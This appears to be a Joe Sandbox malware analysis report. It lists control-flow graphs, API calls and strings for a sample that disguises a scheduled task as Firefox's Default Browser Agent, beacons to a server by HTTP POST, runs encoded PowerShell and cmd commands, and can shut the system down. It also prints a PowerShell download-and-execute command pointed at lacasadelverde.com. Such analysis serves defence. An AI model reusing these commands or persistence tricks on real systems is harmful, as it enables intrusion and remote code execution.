                      control_flow_graph 290 5e6d50-5e6da9 VariantInit CoCreateInstance 291 5e6dab-5e6dda 290->291 292 5e6e09 290->292 291->292 298 5e6ddc-5e6dfc SysAllocString 291->298 293 5e6e0c-5e6e0f 292->293 294 5e6e13-5e6e1b 293->294 296 5e6e1d-5e6e1e SysFreeString 294->296 297 5e6e20-5e6e24 294->297 296->297 299 5e717a-5e717f 297->299 300 5e6e2a-5e6e5b SysAllocString SysFreeString 297->300 298->293 304 5e6dfe-5e6e07 298->304 301 5e7187-5e7190 299->301 302 5e7181-5e7183 299->302 306 5e6e7d-5e6e7f 300->306 307 5e6e5d-5e6e7a SysAllocString SysFreeString 300->307 302->301 304->294 308 5e6e99-5e6eb1 306->308 309 5e6e81-5e6e97 SysAllocString SysFreeString 306->309 307->306 313 5e6eb7-5e6ecd 308->313 314 5e7171-5e7175 308->314 309->308 316 5e6ecf-5e6f0b SysAllocString SysFreeString SysAllocString SysFreeString 313->316 317 5e6f10-5e6f26 313->317 314->299 316->317 320 5e6f28-5e6f6f SysAllocString SysFreeString 317->320 321 5e6f74-5e6f98 317->321 320->321 325 5e6f9e-5e6faf 321->325 326 5e7036-5e703b 321->326 325->326 334 5e6fb5-5e6fc8 325->334 328 5e703d-5e703f 326->328 329 5e7043-5e7048 326->329 328->329 332 5e704a-5e704c 329->332 333 5e7050-5e7074 329->333 332->333 339 5e70d6-5e70db 333->339 340 5e7076-5e7087 333->340 334->326 341 5e6fca-5e700c SysAllocString SysFreeString SysAllocString SysFreeString 334->341 342 5e70dd-5e70df 339->342 343 5e70e3-5e70e8 339->343 340->339 351 5e7089-5e709c 340->351 358 5e700e-5e7028 SysAllocString SysFreeString 341->358 359 5e702d-5e7031 341->359 342->343 345 5e70ea-5e70ec 343->345 346 5e70f0-5e70f4 343->346 345->346 348 5e7168-5e716c 346->348 349 5e70f6-5e7162 VariantInit SysAllocString * 2 SysFreeString VariantClear 346->349 348->314 349->348 351->339 355 5e709e-5e70b9 SysAllocString SysFreeString 351->355 360 5e70cd-5e70d1 355->360 361 5e70bb-5e70cb SysAllocString SysFreeString 355->361 358->359 359->326 360->339 361->360
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 005E6D6E
                      • CoCreateInstance.OLE32(005E1020,00000000,00000001,005E1000,?), ref: 005E6D9B
                      • SysAllocString.OLEAUT32(005E1498), ref: 005E6DE1
                      • SysFreeString.OLEAUT32(?), ref: 005E6E1E
                      • SysAllocString.OLEAUT32(\Mozilla), ref: 005E6E2F
                      • SysFreeString.OLEAUT32(00000000), ref: 005E6E51
                      • SysAllocString.OLEAUT32(\Mozilla), ref: 005E6E62
                      • SysFreeString.OLEAUT32(00000000), ref: 005E6E78
                      • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 005E6E86
                      • SysFreeString.OLEAUT32(00000000), ref: 005E6E97
                      • SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 005E6ED4
                      • SysFreeString.OLEAUT32(00000000), ref: 005E6EE3
                      • SysAllocString.OLEAUT32(Mozilla), ref: 005E6EEA
                      • SysFreeString.OLEAUT32(00000000), ref: 005E6EF9
                      • SysAllocString.OLEAUT32(PT0S), ref: 005E6F4E
                      • SysFreeString.OLEAUT32(00000000), ref: 005E6F5D
                      • SysAllocString.OLEAUT32(Trigger1), ref: 005E6FCF
                      • SysFreeString.OLEAUT32(00000000), ref: 005E6FDE
                      • SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 005E6FE5
                      • SysFreeString.OLEAUT32(00000000), ref: 005E6FF4
                      • SysAllocString.OLEAUT32(PT1M), ref: 005E7013
                      • SysFreeString.OLEAUT32(00000000), ref: 005E7022
                      • SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 005E70A3
                      • SysFreeString.OLEAUT32(00000000), ref: 005E70B2
                      • SysAllocString.OLEAUT32(?), ref: 005E70BC
                      • SysFreeString.OLEAUT32(00000000), ref: 005E70CB
                      • VariantInit.OLEAUT32(?), ref: 005E70FA
                      • SysAllocString.OLEAUT32(005E113C), ref: 005E710E
                      • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 005E711F
                      • SysFreeString.OLEAUT32(00000000), ref: 005E715C
                      • VariantClear.OLEAUT32(?), ref: 005E7162
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
                      • String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 318146B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
                      • API String ID: 3904693211-3377861604
                      • Opcode ID: 461b4af9724f2a7d211998b891fdc9a082219d0cc31b56b065405d0b3f4b68b4
                      • Instruction ID: cb8549d326701b0c3378c3811601de5df591c59f4185d31fafab88bbea334446
                      • Opcode Fuzzy Hash: 461b4af9724f2a7d211998b891fdc9a082219d0cc31b56b065405d0b3f4b68b4
                      • Instruction Fuzzy Hash: C6F11A70A00259AFDB14DFA9C888FAEBBB8FF49344F104158F549EB250DB71AD45CBA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 400 5e8120-5e8175 wsprintfA GetTickCount64 call 5e2810 403 5e8178-5e8199 call 5e6830 400->403 406 5e81ad-5e81bb lstrcmpA 403->406 407 5e819b-5e81ab Sleep 403->407 408 5e81ce-5e81f8 call 5e65e0 * 2 call 5e63f0 406->408 409 5e81bd-5e81cc call 5e93b0 call 5e5780 406->409 407->403 420 5e81fe-5e8200 408->420 421 5e867b-5e8699 GetTickCount64 408->421 409->403 420->421 424 5e8206-5e820c 420->424 422 5e86be-5e86db call 5e5780 Sleep 421->422 423 5e869b 421->423 422->403 425 5e869d-5e869f 423->425 426 5e86a1-5e86bb call 5e2810 call 5e76f0 423->426 424->421 427 5e8212-5e8285 call 5e57a0 call 5e7710 call 5e2670 call 5e5760 call 5e57a0 call 5e65e0 call 5e2810 call 5e76f0 StrToIntA 424->427 425->422 425->426 426->422 450 5e828b 427->450 451 5e8671-5e8679 call 5e5780 427->451 453 5e8292-5e82a6 call 5e65e0 * 2 450->453 454 5e8653-5e865a call 5e6370 450->454 451->422 453->451 463 5e82ac-5e82ae 453->463 454->451 461 5e865c-5e866b InitiateSystemShutdownExW 454->461 461->451 463->451 464 5e82b4-5e82dd StrToIntA call 5e63f0 call 5e5760 463->464 464->451 469 5e82e3-5e82e9 464->469 470 5e832f-5e8332 469->470 471 5e82eb-5e832d GetSystemDirectoryW PathCombineW wnsprintfW 469->471 472 5e8384-5e83cb GetModuleHandleA GetProcAddress * 2 470->472 473 5e8334-5e834d call 5e63f0 call 5e2950 470->473 471->472 474 5e83cd-5e83d0 472->474 475 5e83d3-5e83d7 472->475 473->472 485 5e834f-5e837f ExpandEnvironmentStringsW wnsprintfW call 5e5780 473->485 474->475 477 5e83d9-5e83ee call 5e5850 475->477 478 5e8411-5e8435 LoadLibraryA GetProcAddress 475->478 483 5e8439-5e843e 477->483 488 5e83f0-5e840f call 5e63f0 call 5e2840 call 5e5780 477->488 478->483 486 5e8445-5e8457 call 5e5760 483->486 487 5e8440 483->487 485->472 494 5e845d-5e84e2 call 5e9350 call 5e7710 wsprintfA wnsprintfA call 5e2670 call 5e6830 486->494 495 5e84f8-5e850f call 5e5780 * 3 486->495 487->486 488->483 514 5e84eb-5e84f5 call 5e5780 494->514 515 5e84e4-5e84e6 call 5e5780 494->515 495->422 514->495 515->514
                      APIs
                      • wsprintfA.USER32 ref: 005E8146
                      • GetTickCount64.KERNEL32 ref: 005E8154
                        • Part of subcall function 005E6830: ObtainUserAgentString.URLMON(00000000,?,?), ref: 005E6852
                        • Part of subcall function 005E6830: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005E6872
                        • Part of subcall function 005E6830: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E68D8
                        • Part of subcall function 005E6830: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 005E6911
                        • Part of subcall function 005E6830: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E692E
                        • Part of subcall function 005E6830: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 005E6967
                        • Part of subcall function 005E6830: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005E6990
                      • Sleep.KERNEL32(00000000), ref: 005E81A6
                      • lstrcmpA.KERNEL32(00000000,INIT), ref: 005E81B3
                      • StrToIntA.SHLWAPI(00000000), ref: 005E8276
                      • StrToIntA.SHLWAPI(00000000), ref: 005E82BB
                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005E82F7
                      • PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 005E8310
                      • wnsprintfW.SHLWAPI ref: 005E8324
                      • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005E8360
                      • wnsprintfW.SHLWAPI ref: 005E8374
                        • Part of subcall function 005E5780: GetProcessHeap.KERNEL32(00000000,00000000,005E86C5), ref: 005E5787
                        • Part of subcall function 005E5780: HeapFree.KERNEL32(00000000), ref: 005E578E
                      • GetModuleHandleA.KERNEL32(kernel32), ref: 005E8397
                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005E83A5
                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005E83BA
                      • LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 005E841B
                      • GetProcAddress.KERNEL32(00000000), ref: 005E8422
                      • wsprintfA.USER32 ref: 005E8482
                      • wnsprintfA.SHLWAPI ref: 005E84AE
                        • Part of subcall function 005E2950: GetProcessHeap.KERNEL32(00000008,?), ref: 005E2962
                        • Part of subcall function 005E2950: HeapAlloc.KERNEL32(00000000), ref: 005E2969
                      • Sleep.KERNEL32(00000000), ref: 005E86D6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
                      • String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
                      • API String ID: 1920831074-1153165106
                      • Opcode ID: 705bb8af4e27980651be8d93c891a6723e4fbc6bf681520760ff482ba4028dd7
                      • Instruction ID: bb6838876ef0298db8af09a07016ded1227131dd5431235fa283ab72d0646fe1
                      • Opcode Fuzzy Hash: 705bb8af4e27980651be8d93c891a6723e4fbc6bf681520760ff482ba4028dd7
                      • Instruction Fuzzy Hash: 26C1D671E002959BDB1CEBB6CC89AAF7FB9BF54340F100559E486A7291EF74AD04CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 519 5e6830-5e6878 ObtainUserAgentString MultiByteToWideChar 520 5e687a-5e687f 519->520 521 5e6881-5e689d GetProcessHeap HeapAlloc 519->521 524 5e68b9-5e68c8 call 5e6670 520->524 522 5e689f-5e68b5 MultiByteToWideChar 521->522 523 5e68b7 521->523 522->524 523->524 527 5e68ca-5e68e2 InternetOpenW 524->527 528 5e68e8-5e68ff 527->528 529 5e6a66-5e6a6a 527->529 530 5e6906-5e691b InternetSetOptionW 528->530 531 5e6a6c-5e6a71 529->531 532 5e6a76-5e6a87 529->532 530->530 533 5e691d-5e693b InternetConnectW 530->533 531->527 534 5e6a89-5e6a8f GetProcessHeap HeapFree 532->534 535 5e6a91-5e6a96 532->535 538 5e6a58-5e6a61 InternetCloseHandle 533->538 539 5e6941-5e6971 HttpOpenRequestW 533->539 534->535 536 5e6a98-5e6a9e GetProcessHeap HeapFree 535->536 537 5e6aa0-5e6aa5 535->537 536->537 540 5e6aaf-5e6ab7 537->540 541 5e6aa7-5e6aad GetProcessHeap HeapFree 537->541 538->532 544 5e6a63 538->544 542 5e6a4c 539->542 543 5e6977-5e6998 InternetQueryOptionW 539->543 541->540 545 5e6a52-5e6a55 InternetCloseHandle 542->545 546 5e699a-5e69aa InternetSetOptionW 543->546 547 5e69b0-5e69c6 HttpSendRequestW 543->547 544->529 545->538 546->547 548 5e69c8-5e69ca 547->548 549 5e6a41-5e6a4a InternetCloseHandle 547->549 550 5e69d0-5e69eb InternetQueryDataAvailable 548->550 549->545 551 5e69ed-5e69f5 550->551 552 5e6a31-5e6a33 550->552 553 5e6a08-5e6a12 GetProcessHeap HeapReAlloc 551->553 554 5e69f7-5e6a06 GetProcessHeap HeapAlloc 551->554 552->550 555 5e6a35-5e6a3a 552->555 556 5e6a18-5e6a2f InternetReadFile 553->556 554->556 557 5e6a3e 555->557 558 5e6a3c 555->558 556->552 557->549 558->557
                      APIs
                      • ObtainUserAgentString.URLMON(00000000,?,?), ref: 005E6852
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005E6872
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005E688B
                      • HeapAlloc.KERNEL32(00000000), ref: 005E6892
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005E68B3
                      • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E68D8
                      • InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 005E6911
                      • InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E692E
                      • HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 005E6967
                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005E6990
                      • InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 005E69AA
                      • HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,?), ref: 005E69BE
                      • InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 005E69E0
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005E69F9
                      • HeapAlloc.KERNEL32(00000000), ref: 005E6A00
                      • GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 005E6A0B
                      • HeapReAlloc.KERNEL32(00000000), ref: 005E6A12
                      • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 005E6A26
                      • InternetCloseHandle.WININET(00000000), ref: 005E6A48
                      • InternetCloseHandle.WININET(00000000), ref: 005E6A53
                      • InternetCloseHandle.WININET(00000000), ref: 005E6A59
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005E6A8C
                      • HeapFree.KERNEL32(00000000), ref: 005E6A8F
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005E6A9B
                      • HeapFree.KERNEL32(00000000), ref: 005E6A9E
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005E6AAA
                      • HeapFree.KERNEL32(00000000), ref: 005E6AAD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
                      • String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
                      • API String ID: 2744214989-3343008755
                      • Opcode ID: 56156ea731aea4129c7e665cd9320fe819219aeeca2e0b7f57f265c073756786
                      • Instruction ID: 7c588cde2b339bf559ca813578adfccb4351d07414f339d69fb983f83907df6e
                      • Opcode Fuzzy Hash: 56156ea731aea4129c7e665cd9320fe819219aeeca2e0b7f57f265c073756786
                      • Instruction Fuzzy Hash: E3719271E40259ABEB189B95CC89FAF7AB8BF14791F104019FA41F7290DBB0AD049B64

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00F031C0: task.LIBCPMTD ref: 00F032A1
                        • Part of subcall function 00F031C0: task.LIBCPMTD ref: 00F032B0
                      • task.LIBCPMTD ref: 00F03748
                        • Part of subcall function 00F03410: task.LIBCPMTD ref: 00F0342D
                        • Part of subcall function 00F03410: task.LIBCPMTD ref: 00F03435
                        • Part of subcall function 00F03410: task.LIBCPMTD ref: 00F0343D
                        • Part of subcall function 00F03450: task.LIBCPMTD ref: 00F03522
                        • Part of subcall function 00F03450: task.LIBCPMTD ref: 00F03531
                        • Part of subcall function 00F03640: task.LIBCPMTD ref: 00F03653
                        • Part of subcall function 00F02A80: task.LIBCPMTD ref: 00F02A8A
                        • Part of subcall function 00F02B80: task.LIBCPMTD ref: 00F02C4A
                        • Part of subcall function 00F02B80: task.LIBCPMTD ref: 00F02C59
                      • task.LIBCPMTD ref: 00F038A7
                        • Part of subcall function 00F02D00: task.LIBCPMTD ref: 00F02D8B
                        • Part of subcall function 00F02D00: task.LIBCPMTD ref: 00F02D97
                        • Part of subcall function 00F02D00: task.LIBCPMTD ref: 00F02DA3
                        • Part of subcall function 00F02D00: task.LIBCPMTD ref: 00F02DB2
                        • Part of subcall function 00F01BC0: task.LIBCPMTD ref: 00F01CB3
                        • Part of subcall function 00F01BC0: task.LIBCPMTD ref: 00F01CC2
                        • Part of subcall function 00F01DD0: task.LIBCPMTD ref: 00F01E73
                        • Part of subcall function 00F01DD0: task.LIBCPMTD ref: 00F01E82
                        • Part of subcall function 00F01FE0: task.LIBCPMTD ref: 00F02065
                        • Part of subcall function 00F01FE0: task.LIBCPMTD ref: 00F02074
                        • Part of subcall function 00F021D0: task.LIBCPMTD ref: 00F022AD
                        • Part of subcall function 00F021D0: task.LIBCPMTD ref: 00F022BC
                      • task.LIBCPMTD ref: 00F03B39
                        • Part of subcall function 00F027E0: task.LIBCPMTD ref: 00F02805
                      • task.LIBCPMTD ref: 00F03BD3
                      Strings
                      • qwqygrhgjnlaslbxrtpkmtdkuotavmzczxrpxcrwtsmbsjlrxtrernmpidlygcejepskuuax, xrefs: 00F037F2
                      • erlehkqeoafjbbakngeamygibfibycnzoxdforwfarpfohjilxvtqpjhokuhneptpradfswisqtlicj, xrefs: 00F03773
                      • uxxztqzgwwuzqaevnavsfydrh, xrefs: 00F03900
                      • qdgrecqxaamyajazrwulmwar, xrefs: 00F036A3
                      • gvnzsipipcghsiqztwv, xrefs: 00F0378C
                      • nifwxqeymajpfnuvadyfsnxaotjoosfbtarwsxjgymiautkdtuhcyuvwolhqwuiwfzovgmpyzzdzptdmlxywmmmznckxkgrsxp, xrefs: 00F039C2
                      • auflmecuefrwdklytrcnktmoa, xrefs: 00F039A6
                      • lypanvubxxcyflbridlqlwfpuobrhtkfaezqbqqgqatvjqttkwfgnihfgahkdazhgbiobfwxbdqur, xrefs: 00F03A37
                      • bgwayqjocvuljtzygwhgunsoeayvlexsooubzvltluxjsxepesiiyrsulnbbmvdoze, xrefs: 00F03A65
                      • mszimdsmagcsvicmxoepfxhbkeaeo, xrefs: 00F037C6
                      • mwwmnyrbpxfpxjumsjlgssbxzxlncpuuhqqfqubyiwnlmenhguxbklwzqksybicmwyiuxzuesoaeeyphcvwrprhqsvetlce, xrefs: 00F03946
                      • hwlbdurvyvvqldatflklohusonaqpzyyypeogrlsqivrfmncjpytgjrvdojhcszsnyfnrzawzrhb, xrefs: 00F036D4
                      • pdhbkyhzkmcfitopomizjflnklirmfrrzkmwtaywnbldpzvwnxwmu, xrefs: 00F03757
                      • cct, xrefs: 00F03BA3
                      • eayhpemxuutcdhjelpkfaiddjsblupzguucsjdwrhyqfvqahegmpewibrwjckldgxuwebokbvp, xrefs: 00F03B7F
                      • xnolhfqebbnrgeazvflldahutuuqsgqykleatodisqmzdvbalgus, xrefs: 00F03B46
                      • kiaoobdghby, xrefs: 00F03928
                      • pfytwtrjvw, xrefs: 00F038E7
                      • wmjkzdvgppomvnsashxqdbacmylifgmxhbtqsqswhznyf, xrefs: 00F038CB
                      • jlwhzwxcgwxeqybcsimiysboffbjhvvezemcirfkbg, xrefs: 00F03813
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: auflmecuefrwdklytrcnktmoa$bgwayqjocvuljtzygwhgunsoeayvlexsooubzvltluxjsxepesiiyrsulnbbmvdoze$cct$eayhpemxuutcdhjelpkfaiddjsblupzguucsjdwrhyqfvqahegmpewibrwjckldgxuwebokbvp$erlehkqeoafjbbakngeamygibfibycnzoxdforwfarpfohjilxvtqpjhokuhneptpradfswisqtlicj$gvnzsipipcghsiqztwv$hwlbdurvyvvqldatflklohusonaqpzyyypeogrlsqivrfmncjpytgjrvdojhcszsnyfnrzawzrhb$jlwhzwxcgwxeqybcsimiysboffbjhvvezemcirfkbg$kiaoobdghby$lypanvubxxcyflbridlqlwfpuobrhtkfaezqbqqgqatvjqttkwfgnihfgahkdazhgbiobfwxbdqur$mszimdsmagcsvicmxoepfxhbkeaeo$mwwmnyrbpxfpxjumsjlgssbxzxlncpuuhqqfqubyiwnlmenhguxbklwzqksybicmwyiuxzuesoaeeyphcvwrprhqsvetlce$nifwxqeymajpfnuvadyfsnxaotjoosfbtarwsxjgymiautkdtuhcyuvwolhqwuiwfzovgmpyzzdzptdmlxywmmmznckxkgrsxp$pdhbkyhzkmcfitopomizjflnklirmfrrzkmwtaywnbldpzvwnxwmu$pfytwtrjvw$qdgrecqxaamyajazrwulmwar$qwqygrhgjnlaslbxrtpkmtdkuotavmzczxrpxcrwtsmbsjlrxtrernmpidlygcejepskuuax$uxxztqzgwwuzqaevnavsfydrh$wmjkzdvgppomvnsashxqdbacmylifgmxhbtqsqswhznyf$xnolhfqebbnrgeazvflldahutuuqsgqykleatodisqmzdvbalgus
                      • API String ID: 1384045349-3352526687
                      • Opcode ID: ca584bd06b18e7efb4569ffd1188ec691f9c44a45e2c1d1b5509d6ed0631f596
                      • Instruction ID: 716503a53f598130393ca2648dce35b1c52a3d46c578c3089b8dbc5313b86c7d
                      • Opcode Fuzzy Hash: ca584bd06b18e7efb4569ffd1188ec691f9c44a45e2c1d1b5509d6ed0631f596
                      • Instruction Fuzzy Hash: 86E13D70E507089AD700FF78DD1679EBBB6BB06B90F404219F5453E1C1EFB11685AB92
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: S$ayufwgulvuygbab$cghngzwziwanmbszqlbunzalhundohfsmgyjluxqyswlptwwjdpgxtza$duokwoniipliaktpcumxirsegoopnpgqtpzdmrgqunqsuxltfargaoyfbibqgre$gjeerdbceuzsmkxmsxiomvcavimwsztwserhzklmfwksvuzqomelhhgekpjekv$hczcjatmoheclnpwaqmeqzj$xkmhkueozjyetdrqi
                      • API String ID: 1384045349-3540177847
                      • Opcode ID: b94e5f8edd2425800532bc021216919892ca367b18fb0cf74bbd460e98b98101
                      • Instruction ID: cd29328b496e2c23315196fe88505d4b295583d5e8834758bf59c5bb665cd9a4
                      • Opcode Fuzzy Hash: b94e5f8edd2425800532bc021216919892ca367b18fb0cf74bbd460e98b98101
                      • Instruction Fuzzy Hash: 70B11570D04268DAEB64EB64CD55BEDBBB4AB01300F5081D9E149B7282DB745F88FF61
                      APIs
                      • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 005E8921
                      • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 005E8934
                      • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005E8947
                      • GetFileAttributesW.KERNEL32(?), ref: 005E896D
                      • GetFileAttributesW.KERNEL32(?), ref: 005E8986
                      • lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 005E899D
                      • wnsprintfW.SHLWAPI ref: 005E89C0
                      • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 005E89E2
                      Strings
                      • %SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 005E892F
                      • sd2.ps1, xrefs: 005E8978
                      • %ComSpec%, xrefs: 005E8942
                      • /c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 005E89AF
                      • sd4.ps1, xrefs: 005E8991
                      • %SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 005E891C
                      • open, xrefs: 005E89DB
                      • https://lacasadelverde.com/css, xrefs: 005E89AA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
                      • String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://lacasadelverde.com/css$open$sd2.ps1$sd4.ps1
                      • API String ID: 4132772799-372348506
                      • Opcode ID: a1d786a384e8b7ff7300ce8a1856e96492177015d43ac3e30481172e1d4fc3d9
                      • Instruction ID: ba87fd0dbf696950b780546ee0df15c085ea025adbc7d4747f23285ccf734d41
                      • Opcode Fuzzy Hash: a1d786a384e8b7ff7300ce8a1856e96492177015d43ac3e30481172e1d4fc3d9
                      • Instruction Fuzzy Hash: C2219371D4065CAAEB28D7A58C45FFA7B6CBB04714F0005D2F6D8E20D1DBB06A888F95
                      APIs
                      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 005E5883
                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E58E1
                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E58F4
                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E58F9
                      • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5910
                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5927
